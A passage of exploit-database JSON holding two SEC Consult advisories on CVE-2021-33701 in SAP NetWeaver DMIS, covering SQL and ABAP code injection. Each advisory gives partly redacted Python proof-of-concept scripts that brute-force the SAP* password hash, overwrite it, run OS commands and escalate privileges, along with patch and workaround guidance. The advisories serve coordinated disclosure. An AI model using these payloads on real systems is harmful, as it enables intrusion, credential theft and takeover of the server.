module\nIUUC_RECON_RC_COUNT_TABLE_BIG is vulnerable to an ADBC SQL Injection. The\nfunction is part of the package CNV_INC_PROCESSING_REMOTE inside the function\nmodule group IUUC_REMOTE. It is typically used to count table records in the\ncontext of logging table and trigger creations.\n\nADBC is an API for the Native SQL interface of the AS ABAP that is based on\nABAP Objects and can be used to pass Native SQL statements to the database\ninterface. ADBC SQL injections are a very serious type of vulnerability as\nthey allow attackers not only to access data directly at the database layer\nbut also to break out of the current client context. Moreover, stacked queries\ncan be used to perform arbitrary read/write commands. All of this leads to\nfull compromise of the SAP application server.\n\nAs the affected function module is remote enabled, it allows attackers to\nperform remote attacks via RFC.\n\nNote that the vulnerability was originally found by SEC Consult during a\nresearch on a system with DMIS in version DMIS 2011_1_731 SP 0013. In this\nversion, the same parameter IT_WHERE_CLAUSE was vulnerable to an ABAP\nCommand Injection.\n\nThe vulnerability seems to have been fixed insufficiently, leaving behind this\nADBC SQL Injection. The advisory can be viewed at the following URL:\n\nhttps://sec-consult.com/vulnerability-lab/advisory/remote-abap-code-injection-in-sap-netweaver/\n\n\nAttack Prerequisites\n--------------------\n1. Remote ADBC SQL Injection in SAP IUUC_RECON_RC_COUNT_TABLE_BIG (CVE-2021-33701)\n\nFirst prerequisite is the authorization object S_DMIS (SAP SLO Data migration\nserver) with at least the following settings:\n\nMBT_PR_ARE: SAP Landscape Transformation\nMBT_PR_LEV: (not needed to be set)\nACTVT: 03 Display\n\nNote that it is common practice that authorization objects are (mis)configured\nwith wildcards, which increases the likelihood of exploitation of the vulnerability.\n\nFurther, authorization to perform function calls (S_RFC) has to be\ngranted for remote exploitation or access to SE37 for local privilege escalation\n\nIn the majority of cases internal RFC communications are nowadays still found\nto be unencrypted. This increases the risk that attackers wiretap account\npasswords. Once such user is hijacked, the attacker has gained all necessary\nprerequisites for further attacks as described in this advisory.\n\n\nProof of concept:\n-----------------\n1. Remote ADBC SQL Injection in SAP IUUC_RECON_RC_COUNT_TABLE_BIG (CVE-2021-33701)\n\nExample A: Arbitrary Read\n\nAs a proof of concept, a script was created to brute force the password hash\nof the SAP* users in client 000 while authenticated to client 001. This\nalso demonstrates the possibility of breaking out of the current client context.\nFor this example, a boolean based Blind SQL attack was used. In\norder to get the exploitation to work, an arbitrary existing table has to be\nspecified for the parameter I_TABNAME (in this PoC ZDEMO_SOH was chosen).\n\nThe following excerpt shows the source code of the script:\n\n* ************************************************************************** *\n#!/usr/bin/env python3\nfrom pyrfc import Connection\nfrom string import ascii_letters\n\ndef generate_alphabet():\n alph = []\n for c in ascii_letters:\n alph.append(c)\n for i in range(0,10):\n alph.append(str(i))\n alph.append('+')\n alph.append('/')\n alph.append('=')\n return alph\n\nif __name__ == '__main__':\n final_str = \"\"\n conn = Connection(ashost=\"XX.XX.XX.XX\", sysnr=\"00\", client= \"001\",\n user= \"Peter\", passwd=\"Sap123456\", lang='EN')\n alph = generate_alphabet()\n\n print(\"Brute Forcing SAP* password hash in client 000 ...\")\n\n for i in range(16, 61):\n toggle = 0\n for c in alph:\n where_clause = (\"('\" + c +\n \"' IN (SELECT SUBSTRING(PWDSALTEDHASH,\" + str(i) +\n \",1) from USR02 WHERE BNAME='SAP*' AND MANDT='000'))\")\n\n [ --- PoC partially removed --- ]\n\n if(result['ET_COUNT'][0]['RECCNT'] != 0):\n final_str += c\n print(\"{x-issha, 1024}\" + final_str,end='\\r')\n print (\"\\n\")\n* ************************************************************************** *\n\nRunning the code produces the following output:\n\n$> poc_iuuc_remote.py\nBrute Forcing SAP* password hash in client 000...\n{x-issha, 1024}DRM3SNvfwWWsDf71QYyx+5L0AkN3l0nyKgPjvlBsPqE=\n\n\nExample B: Arbitrary Write\n\nThe next proof of concept demonstrates arbitrary write to the database by using\nstacked queries. The following payload inserts the password hash corresponding\nto the plaintext password \"Test123\" into the SAP* users of all clients and\nthen authenticates with the user SAP* on the other client 000. Afterwards, the\nOS command \"ip addr\" is executed:\n\n* ************************************************************************** *\n#!/usr/bin/env python3\nfrom pyrfc import Connection\n\ndef read_ABAP_Report():\n with open('X:\\\\test.abap') as file:\n content = file.readlines()\n content = [x.strip() for x in content]\n return content\n\nif __name__ == '__main__':\n final_str = \"\"\n conn = Connection(ashost=\"XX.XX.XX.XX\", sysnr=\"00\", client= \"001\",\n user= \"Peter\", passwd=\"Sap123456\", lang='EN')\n\n where_clause = (\n \"1 = 1 ); UPDATE USR02 SET PWDSALTEDHASH = \"\n \"'{x-issha, 1024}voJRVT/rrJ31pxfmhb/zaBqhXA81CYKSnylMlKr/CkE=' \"\n \"WHERE BNAME = 'SAP*'; COMMIT WORK; --\")\n\n [ --- PoC partially removed --- ]\n\n conn2 = Connection(ashost=\"XX.XX.XX.XX\", sysnr=\"00\", client= \"000\",\n user= \"SAP*\", passwd=\"Test123\", lang='EN')\n\n inject = ['REPORT Z_TEST213.'\n 'DATA(c) = \\'ip addr\\'.',\n 'DATA t TYPE TABLE OF char255.',\n 'DATA l(250) TYPE c.',\n 'CALL \\'SYSTEM\\' ID \\'COMMAND\\' FIELD c ID \\'TAB\\' FIELD t.',\n 'LOOP AT t INTO l.',\n 'WRITE: / l.',\n 'ENDLOOP.']\n\n params = {'PROGRAM':inject}\n result = conn2.call('/SAPDS/RFC_ABAP_INSTALL_RUN', **params)\n for x in result['WRITES']:\n print(x['ZEILE'])\n* ************************************************************************** *\n\nRunning the code produces the following output:\n\n$> .\\poc_iuuc_remote2.py\n1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group\n default ql\n link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00\n inet 127.0.0.1/8 scope host lo\n valid_lft forever preferred_lft forever\n inet6 ::1/128 scope host\n valid_lft forever preferred_lft forever\n2: enp0s3: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc pfifo_fast state\n DOWN\n link/ether XX:XX:XX:XX:XX:XX brd ff:ff:ff:ff:ff:ff\n3: enp0s8: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state U\n P grou\n link/ether XX:XX:XX:XX:XX:XX brd ff:ff:ff:ff:ff:ff\n inet XX.XX.XX.XX/24 brd XX.XX.XX.255 scope global noprefixroute enp0s8\n valid_lft forever preferred_lft forever\n inet6 fe80::a00:27ff:fec3:fa40/64 scope link\n valid_lft forever preferred_lft forever\n\n\nVulnerable / tested versions:\n-----------------------------\nThis vulnerability has been tested on SAP Netweaver 752 SP-LEVEL 0004\nDMIS Release 2011_1_731 SP-Level 0016 SP SAPK-11616INDMIS.\n\nAccording to the vendor, the following products / versions are affected:\n* SAPSCORE 125 < SAPK-12502INSAPSCORE\n* S4CORE 105 < SAPK-10503INS4CORE\n* S4CORE 104 < SAPK-10405INS4CORE\n* S4CORE 103 < SAPK-10307INS4CORE\n* S4CORE 102 < SAPK-10209INS4CORE\n* S4CORE 101 < SAPK-10111INS4CORE\n* S4CORE 100\n* DMIS 2018_1_752 < SAPK-20106INDMIS\n* DMIS 2020 < SAPK-20202INDMIS\n* DMIS 2011_1_700 < SAPK-11321INDMIS\n* DMIS 2011_1_710 < SAPK-11421INDMIS\n* DMIS 2011_1_730 < SAPK-11521INDMIS\n* DMIS 2011_1_731 < SAPK-11621INDMIS\n* DMIS 2011_1_620 < SAPK-11121INDMIS\n* DMIS 2011_1_640 < SAPK-11221INDMIS\n\n\nVendor contact timeline:\n------------------------\n2021-07-08: Contacting SAP Product Security Response Team through Web Portal\n https://www.sap.com/about/trust-center/security/incident-management.html\n ID SR-21-00009 has been assigned\n2021-07-19: Vendor confirms vulnerability\n2021-08-10: SNote 3078312 with patch released\n2021-11-17: SEC Consult sends final advisory to vendor and informs about release\n date\n2021-11-18: SAP requests to obfuscate or remove PoC\n2021-12-14: Coordinated release of security advisory\n\n\nSolution:\n---------\nSEC Consult advises all SAP\u00ae customers to implement SAP Security Note\n3078312 immediately. Note that Security Note 3078312 contains no automatic\ncorrection instructions for customers who run systems with DMIS versions or\nSupport Package levels lower than DMIS 2011 SP10 (2015). Please refer to the\nsection workaround.\n\n\nWorkaround:\n-----------\nIn lower SP levels, the correction can be applied manually by modifying\nfunction module IUUC_RECON_RC_COUNT_TABLE_BIG adding the following statement\ndirectly after the authorization check:\n\nASSERT it_where_clause[] IS INITIAL.\n", "sourceHref": "https://0day.today/exploit/37148", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-12-15T19:43:26", "description": "SAP Netweaver version SAP DMIS 2011_1_731 SP 0013 suffers from a remote ABAP code injection vulnerability in IUUC_RECON_RC_COUNT_TABLE_BIG.", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-15T00:00:00", "type": "zdt", "title": "SAP Netweaver IUUC_RECON_RC_COUNT_TABLE_BIG ABAP Code Injection Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33701"], "modified": "2021-12-15T00:00:00", "id": "1337DAY-ID-37147", "href": "https://0day.today/exploit/description/37147", "sourceData": "=======================================================================\n title: Remote ABAP Code Injection in SAP IUUC_RECON_RC_COUNT_TABLE_BIG\n product: SAP Netweaver\n vulnerable version: SAP DMIS 2011_1_731 SP 0013\n fixed version: see solution section below\n CVE number: CVE-2021-33701\n SAP Note: 3078312\n impact: Critical\n CVSS 3.1 Score: 9.1\n CVSS 3.1 Vector: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H\n homepage: https://www.sap.com/\n found: 2021-07-16\n by: Raschin Tavakoli (Office Vienna)\n SEC Consult Vulnerability Lab\n\n An integrated part of SEC Consult, an Atos company\n Europe | Asia | North America\n\n https://www.sec-consult.com\n\n=======================================================================\n\nVendor description:\n-------------------\n\"SAP SE is a German multinational software corporation based in Walldorf,\nBaden-W\u00fcrttemberg, that develops enterprise software to manage business\noperations and customer relations. The company is especially known for its ERP\nsoftware. SAP is the largest non-American software company by revenue, the\nworld's third-largest publicly-traded software company by revenue, and the\nlargest German company by market capitalisation.\"\n\nSource: https://en.wikipedia.org/wiki/SAP\n\n\nBusiness recommendation:\n------------------------\nSAP\u00ae released the patch (SNote 3078312) and SEC Consult advises all SAP\u00ae\ncustomers to update their systems immediately.\n\nAn in-depth security analysis performed by security professionals is\nhighly advised, as the software may be affected from further security issues.\n\n\nVulnerability overview/description:\n-----------------------------------\n1. Remote ABAP Code Injection in SAP IUUC_RECON_RC_COUNT_TABLE_BIG (CVE-2021-33701)\n\nThe IT_WHERE_CLAUSE parameter of the function module\nIUUC_RECON_RC_COUNT_TABLE_BIG is vulnerable to an ABAP Code Injection.\nUnfiltered user input is used to generate ABAP code dynamically via the\nGENERATE SUBROUTINE statement which then gets executed with a PERFORM\nstatement. As the attacker can freely choose the characters that can be used\nin these fields, he can execute arbitrary ABAP code.\n\nAs the affected function module is remote enabled, it allows attackers to\nperform remote attacks via RFC.\n\nNote that the vulnerable code part inside the function module has been changed\nin newer releases. The original code that was vulnerable to an ABAP Code\nInjection has been replaced with an ADBC driver call. Unfortunately, this\nchange also introduced an SQL injection vulnerability, which was addressed in\nSNote 3078312.\n\nThe issue has been reported in a separate SEC Consult advisory and can be viewed\nat the following URL:\n\nhttps://sec-consult.com/vulnerability-lab/advisory/remote-adbc-sql-injection-in-sap-netweaver\n\n\nAttack Prerequisites\n--------------------\n1. Remote ABAP Code Injection in SAP IUUC_RECON_RC_COUNT_TABLE_BIG (CVE-2021-33701)\n\nFirst prerequisite is the authorization object S_DMIS (SAP SLO Data migration\nserver) with at least the following settings:\n\nMBT_PR_ARE: SAP Landscape Transformation\nMBT_PR_LEV: (not needed to be set)\nACTVT: 03 Display\n\nNote that it is common practice that authorization objects are (mis)configured\nwith wildcards, which increases the likelihood of the vulnerability.\n\nFurther, of course, authorization to perform function calls (S_RFC) has to be\ngranted.\n\nIn the majority of cases internal RFC communications are nowadays still found\nto be unencrypted. This increases the risk that attackers wiretap DMIS related\naccount passwords. Once such user is hijacked, the attacker has gained all\nnecessary prerequisites for further attacks as described in this advisory.\n\n\nProof of concept:\n-----------------\n1. Remote ABAP Code Injection in SAP IUUC_RECON_RC_COUNT_TABLE_BIG (CVE-2021-33701)\n\nAs a proof of concept, a script was created that assigns the attacker himself\nthe reference user DDIC inside the table REFUSER:\n\n* ************************************************************************** *\n#!/usr/bin/env python3\nfrom pyrfc import Connection\n\nif __name__ == '__main__':\n\n mandt = {'000', '001'} # selected for demonstration purpose\n conn = Connection(ashost=\"XX.XX.XX.XX\", sysnr=\"00\", client=\"001\",\n user=\"DEVELOPER\", passwd=\"Sap123456\", lang='EN')\n\n print(\"USREFUS before:\")\n result = conn.call('RFC_READ_TABLE',\n QUERY_TABLE='USREFUS',\n FIELDS=['MANDT', 'BNAME', 'REFUSER'],\n DELIMITER='|'\n )\n column_values = []\n\n for line in result['DATA']:\n print(line['WA'])\n\n [ --- PoC partially removed --- ]\n\n print(\"\\nSending payload ...\\n\")\n\n result = conn.call('RFC_READ_TABLE',\n QUERY_TABLE='USREFUS',\n FIELDS=['MANDT', 'BNAME', 'REFUSER'],\n DELIMITER='|'\n )\n column_values = []\n\n print(\"USREFUS after:\")\n for line in result['DATA']:\n print(line['WA'])\n* ************************************************************************** *\n\nRunning the code produces the following output:\n\n$> iuuc_generic_abap.py\nUSREFUS before:\n001|DEVELOPER |\n001|BWDEVELOPER |\n001|TEST |\n001|E_TEST |\n001|DDIC |\n001|SAP* |\n\nSending payload ...\n\nUSREFUS after:\n001|BWDEVELOPER |\n001|TEST |\n001|E_TEST |\n001|DDIC |\n001|SAP* |\n001|DEVELOPER |DDIC\n \n \nVulnerable / tested versions:\n-----------------------------\nThis vulnerability has been tested on SAP Netweaver 752, 0001 (SP-Level),\nSAPK-11616INDMIS (Support Package) SAP DMIS 2011_1_731.\n\n\nVendor contact timeline:\n------------------------\n2021-07-18: Contacting SAP Product Security Response Team through Web Portal\n https://www.sap.com/about/trust-center/security/incident-management.html\n ID SR-21-00018 has been assigned\n2021-07-21: Vendor informs that the discussion has been taken up to the\n application team\n2022-07-21: Vendor confirms vulnerability but marks it internally as a duplicate\n for CVE-2021-33701 (see our other advisory for this function module)\n2021-11-17: SEC Consult sends final advisory to vendor and informs about release\n date\n2021-12-14: Coordinated release of security advisory\n\n\nSolution:\n---------\nSEC Consult advises all SAP\u00ae customers to implement SAP Security Note\n3078312 immediately. Note that Security Note 3078312 contains no automatic\ncorrection instructions for customers who run systems with DMIS versions or\nSupport Package levels lower than DMIS 2011 SP10 (2015). Please refer to the\nsection workaround.\n\n\nWorkaround:\n-----------\nIn lower SP levels, the correction can be applied manually by modifying\nfunction module IUUC_RECON_RC_COUNT_TABLE_BIG adding the following statement\ndirectly after the authorization check:\n\nASSERT it_where_clause[] IS INITIAL.\n", "sourceHref": "https://0day.today/exploit/37147", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}]}